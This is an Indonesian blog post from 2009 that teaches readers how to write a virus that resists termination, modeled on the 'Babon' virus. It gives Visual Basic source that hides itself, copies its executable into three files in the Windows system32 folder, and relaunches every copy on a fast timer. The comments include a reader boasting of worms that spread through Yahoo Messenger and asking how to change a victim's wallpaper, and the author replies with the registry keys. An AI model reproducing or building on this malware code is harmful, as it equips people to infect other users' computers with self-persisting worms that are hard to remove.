MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Teknik unkill virus Babon

Posted by Morphic pada Agustus 4, 2009


Pernah dengar virus babon? Ooo pasti pernah dong. Dulu teknik yang dipake ama virus ini cukup ngetren dimasa-nya… Sampe-sampe banyak Avmaker juga bingung tuh ama virus ini. Apa yang aneh?

Si Babon ternyata make teknik unkill. Yang artinya ”tidak dapat dibunuh”. Tapi bukan berarti gak bisa mati! Ada cranya juga membunuhnya…

Secara logika begini trik-nya…
-buat lebih dari satu induk virusmu
-perintahkan mereka untuk saling memanggil….

Cukup dua baris itu aja. Ha ha ha. Sepertinya banyak yang udah tahu trik ini tapi gak apa-apa deh buat yang newbie.

Begini. Andaikan kamu membuat virus… Pastinya virus kamu membuat induk di komputer korban…
Perhatikan aku mnulis source code virus sederhana berikut.

Private sub form_load()
App.taskvisible=false
me.visible=false
Call SpreadFile
End sub

Sub SpreadFile()
On error resume next
Dim Location(3) as string
Dim jml as integer
Location(1) = Environ$(“windir”) & “\system32\Top.exe”
Location(2) = Environ$(“windir”) & “\system32\Top2.exe”
Location(3) = Environ$(“windir”) & “\system32\Top3.exe”
For jml = 1 to 3
Filecopy app.path & “\” & app.exename & “.exe” , location(jml)
Next
End Sub

Itu sederhananya.. itu source untuk menyebarkan induk-nya… Lalu?
Supaya kita bisa make teknik unkill tambahkan satu timer yang intervalnya kurang dari 500. (ingat: satu detik sama dengan 1000 interval timer!)

Private sub Timer1_timer()
Shell Environ$(“windir”) & “\system32\Top.exe”
Shell Environ$(“windir”) & “\system32\Top2.exe”
Shell Environ$(“windir”) & “\system32\Top3.exe”
End sub

Lalu jangan lupa tambahkan sedikit code di Form_Load().
Pokoknya terakhir code-nya seprti ini:
Private sub form_load()
If app.Previstance then End
App.taskvisible=false
me.visible=false
Call SpreadFile
End sub

Kalo Babon lain lagi…
Coba buat satu module dan ketik code-nya berikut:

Declare Function FindWindow Lib “user32” Alias “FindWindowA” (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Declare Function GetWindow Lib “user32” (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Declare Function OpenIcon Lib “user32” (ByVal hwnd As Long) As Long
Declare Function SetForegroundWindow Lib “user32” (ByVal hwnd As Long) As Long

Public Const GW_HWNDPREV = 3

Private Sub ShowPrevInstance()
Dim OldTitle As String
Dim ll_WindowHandle As Long
OldTitle = App.Title
App.Title = “abcde – Aplikasi ini akan ditutup!”
ll_WindowHandle = FindWindow(“ThunderRT6Main”, OldTitle)
If ll_WindowHandle = 0 Then Exit Sub
ll_WindowHandle = GetWindow(ll_WindowHandle, GW_HWNDPREV)
Call OpenIcon(ll_WindowHandle)
Call SetForegroundWindow(ll_WindowHandle)
End
End Sub

Sub Main()
If App.PrevInstance Then Showprevinstance

Load Form1
Form1.Show

End sub

Jangan lupa mengubah startup virusmu menjadi “sub main”. Okey!

Sekian tutorial dari saya…
Thanks

By:Morphic
Karta_morphic@yahoo.co.id
Thanks to:
http://www.morphostlab.co.nr
MorphostLab Team
Anak-anak FK USU stambuk 09

7 Tanggapan to “Teknik unkill virus Babon”

  1. Vx said

    Agustus tanggal 4 2009. waktu aq masih suka maen game. hahahahah

  2. poet said

    hihihi. . .
    saya ga pernah nyebarin worm buatan saya dgn sengaja kok. saya cma blajar teknik2 baru, trus d cba d kompi d rmah. kalo brhasil, sourcenya d simpen, file exe-nya di hapus.😀. kalo gagal, ya coba lagi. :p

    worm trakhir udah bsa ngirim pesan lewat YM ama punya fitur auto update. .😀

    oya bang, worm yg bsa ngrubah wallpaper it mainnya dmana? registry? key-nya apa? saya gak brhasil nemuinnya . T-T

    • Morphic said

      mau ngubah wallpaper?
      coba gini:

      HKCU\Control Panel\Desktop-Wallpaper

      HKCU\Control Panel\Desktop\OriginalWallpaper

      HKCU\Control Panel\Desktop\ConvertedWallpaper

      HKU\DEFAULT\Control Panel\Desktop\Wallpaper

  3. poet said

    ada yg mau nyebarin worm buatan saya ndak? xD

  4. yudha said

    kyanya dulu g pernah kena nih virus, basminya pke AV tetangga. nyusahin emang nih virus. btw… virusmu pernah mem-booming gak phic?🙂

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: